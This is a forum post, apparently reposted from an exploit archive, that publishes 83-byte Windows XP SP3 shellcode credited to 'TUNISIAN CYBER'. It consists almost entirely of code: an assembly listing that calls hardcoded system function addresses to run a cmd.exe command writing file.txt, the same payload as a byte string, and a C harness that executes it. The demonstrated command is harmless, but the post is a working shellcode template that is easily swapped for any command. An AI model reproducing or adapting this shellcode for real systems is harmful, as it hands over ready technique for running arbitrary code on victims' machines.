Aerosol Posted May 4, 2015 Report Posted May 4, 2015 /*#[+] Author: TUNISIAN CYBER#[+] Title: Shellcode: win32/xp sp3 Create ("file.txt") (83 bytes)#[+] Date: 15-04-2015#[+] Type: Local Exploits#[+] Tested on: WinXp 32bit SP3#[+] Friendly Sites: sec4ever.com#[+] Twitter: @TCYB3R#[+] Credits: steve hanna projectshellcode.com=============================Assembly:;create.asm[Section .text]BITS 32global _start_start:jmp short GetCommand CommandReturn: pop ebx xor eax,eax push eax push ebx mov ebx,0x7c8623ad call ebx xor eax,eax push eax mov ebx, 0x7c81cafa call ebxGetCommand: call CommandReturn db "cmd.exe /C echo shellcode by tunisian cyber >file.txt" db 0x00=============================*/char shellcode[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23\x86\x7c\xff" "\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78" "\x65\x20\x2f\x43\x20\x65\x63\x68\x6f\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x20\x62\x79" "\x20\x74\x75\x6e\x69\x73\x69\x61\x6e\x20\x63\x79\x62\x65\x72\x20\x3e\x66\x69\x6c\x65\x2e\x74\x78\x74\x00";int main(int argc, char **argv){int (*f)();f = (int ())shellcode;(int)(*f)();}Source Quote